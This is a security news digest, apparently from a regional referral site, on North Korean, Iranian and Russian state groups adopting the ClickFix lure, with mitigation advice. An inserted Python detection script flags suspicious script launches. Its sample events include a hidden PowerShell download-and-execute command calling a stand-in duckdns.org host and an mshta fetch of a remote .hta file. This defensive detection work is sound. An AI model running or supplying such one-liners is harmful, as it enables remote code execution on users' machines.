WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deal daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS' DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do not charge or collect any fees.

State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns

Summary:
Between late 2024 and early 2025, Proofpoint researchers observed a notable trend in which multiple state-sponsored threat actors, including groups from North Korea, Iran, and Russia, began using the ClickFix social engineering technique, which was previously popular among cybercriminals. This technique, characterized by pop-up instructions prompting victims to manually run malicious PowerShell commands, was first seen in early 2024 in campaigns by cybercrime actors such as TA571. Since then, it has spread rapidly across the threat landscape, eventually catching the attention of state actors seeking novel infection methods.

Rather than transforming entire campaigns, state actors such as TA427 (North Korea), TA450 (Iran), and Russian-linked groups UNK_RemoteRogue and TA422 used ClickFix to replace traditional installation and execution stages within existing infection chains. TA427 used this technique in phishing campaigns targeting North Korea-focused researchers, directing victims to spoofed diplomatic meeting invitations that led to decoy PDFs and PowerShell commands, ultimately delivering QuasarRAT. Infrastructure supporting this operation relied on dynamic DNS services and compromised servers in South Korea, with tailored content in multiple languages to bolster the social engineering narrative.

TA450, an Iranian group also known as MuddyWater, employed ClickFix in a broader phishing campaign across the Middle East, impersonating Microsoft to trick recipients into running PowerShell commands that installed remote monitoring tools like Level. This marked a notable expansion beyond their typical Israeli targeting. Meanwhile, UNK_RemoteRogue, a suspected Russian group, used ClickFix in a campaign spoofing Microsoft Office to deliver malicious JavaScript and PowerShell, while TA422 (APT28) leveraged it in phishing emails posing as Google spreadsheets, which led users through reCAPTCHA gates to execute Metasploit payloads.


Security Officer Comments:
Despite the tactic's creative blend of deception and user interaction, Proofpoint noted that none of these actors continued to use ClickFix in sustained campaigns immediately afterward. Most returned to traditional methods, possibly indicating limited short-term success or that the technique is still being evaluated. However, TA427's renewed use of ClickFix in April 2025 suggests ongoing experimentation and potential refinements.

While China has not yet been observed using this technique, Proofpoint believes this may be due to limited visibility rather than a lack of interest, and it is likely that Chinese threat actors are also experimenting with ClickFix behind the scenes.


Suggested Corrections:
  • User Awareness and Training: Train employees to recognize social engineering tactics, particularly pop-up prompts instructing them to run terminal or PowerShell commands. Emphasize that legitimate system instructions will never ask users to manually run commands from emails or websites.
  • Script Execution Restrictions: Configure Group Policy or endpoint security tools to restrict or disable PowerShell, VBScript, and batch script execution for non-administrative users, especially from web browsers or email clients.
  • Email and Web Filtering: Use email security gateways to block phishing emails and prevent delivery of messages with suspicious links or attachments. Implement URL filtering to block known malicious domains, especially those using dynamic DNS (DDNS) services.
  • Application Control and EDR: Deploy Endpoint Detection and Response (EDR) solutions with behavioral detection to monitor for unusual script activity, unauthorized PowerShell usage, and suspicious child processes spawned from office applications or browsers.
  • Restrict Outbound Connections and Monitor DNS: Limit outbound internet access from user workstations where possible, and monitor DNS traffic for requests to DDNS domains or suspicious infrastructure that could be associated with spoofed "secure drives" or malicious command-and-control servers.

IOCs:
https://www.proofpoint.com/us/blog/...d-90-days-state-sponsored-actors-try-clickfix
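The EDR and DNS-monitoring items above are easier to reason about with concrete rules. The following is an added example, not code from this page, Proofpoint, or WNYCyber: a small Python scorer that runs over constructed Sysmon-style process-creation (Event ID 1) and DNS-query (Event ID 22) records and flags the ClickFix shape the summary describes, a script host launched from a browser, the Run dialog (explorer.exe) or an Office application with a hidden-window, policy-bypass or download-cradle command line, plus DNS lookups under dynamic-DNS suffixes. The field names, the regexes, the DDNS suffix list and every sample record are assumptions made for illustration.

```python
"""Toy behavioural detection for ClickFix-style execution over constructed
Sysmon-like events. Added example code, not tooling from Proofpoint, WNYCyber
or any EDR vendor. Field names mirror Sysmon Event ID 1 (ProcessCreate) and
Event ID 22 (DnsQuery); the records, DDNS watchlist and regexes are assumptions
chosen for illustration."""
import re
from dataclasses import dataclass, field

# Parents from which a fresh script-host launch is suspicious. ClickFix lures are
# shown in a browser and pasted into the Run dialog (parent explorer.exe) or a
# terminal; Office apps are included because the guidance above names them.
SUSPICIOUS_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits typical of pasted one-liners (assumed, not exhaustive).
CMDLINE_PATTERNS = [
    (re.compile(r"-(enc|encodedcommand|e)\b", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ex|ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"(downloadstring|invoke-webrequest|\biwr\b|\birm\b|\bcurl\b|\bwget\b)", re.I),
     "download cradle"),
    (re.compile(r"(\bmshta\b|\.hta\b)", re.I), "mshta/HTA"),
]

# Partial, illustrative dynamic-DNS suffixes (assumption: a real deployment would
# load a curated DDNS provider list instead of this short tuple).
DDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org", "dynu.net")


@dataclass
class Finding:
    event_id: int
    host: str
    reasons: list = field(default_factory=list)
    severity: str = "low"


def score_process_event(ev):
    """Return a Finding when a script host starts from a suspicious parent and/or
    with a suspicious command line; None for everything else."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    for pattern, label in CMDLINE_PATTERNS:
        if pattern.search(ev["CommandLine"]):
            reasons.append(label)
    if not reasons:
        return None
    # Suspicious parent plus at least one one-liner trait is the ClickFix shape;
    # either signal alone is weaker evidence and gets a lower severity.
    severity = "high" if parent in SUSPICIOUS_PARENTS and len(reasons) > 1 else "medium"
    return Finding(1, ev["Computer"], reasons, severity)


def score_dns_event(ev):
    """Flag queries whose name falls under a watched dynamic-DNS suffix."""
    name = ev["QueryName"].lower().rstrip(".")
    for suffix in DDNS_SUFFIXES:
        if name == suffix or name.endswith("." + suffix):
            return Finding(22, ev["Computer"], [f"DDNS domain {name}"], "medium")
    return None


def scan(events):
    """Apply the matching rule to each event and collect findings in order."""
    findings = []
    for ev in events:
        hit = score_process_event(ev) if ev["EventID"] == 1 else score_dns_event(ev)
        if hit is not None:
            findings.append(hit)
    return findings


# Constructed sample telemetry (hand-written, not real captures).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://update-check.duckdns.org/x)"'},
    {"EventID": 1, "Computer": "WS-01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Logs"},
    {"EventID": 1, "Computer": "WS-02",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 22, "Computer": "WS-01", "QueryName": "update-check.duckdns.org"},
    {"EventID": 22, "Computer": "WS-02", "QueryName": "login.microsoftonline.com"},
    {"EventID": 1, "Computer": "WS-02",
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha.hta"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] event {f.event_id} on {f.host}: {'; '.join(f.reasons)}")
```

Run as-is, the script reports three findings: the explorer.exe-launched PowerShell one-liner and the Chrome-launched mshta as high, and the duckdns.org lookup as medium, while the administrator's Get-ChildItem from cmd.exe and the Microsoft login lookup stay silent. The parent-plus-command-line pairing is what keeps the rule usable: either signal alone fires on legitimate admin activity, and the combination is the behaviour the guidance above asks EDR to catch.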

Link(s):
https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html
https://www.proofpoint.com/us/blog/...d-90-days-state-sponsored-actors-try-clickfix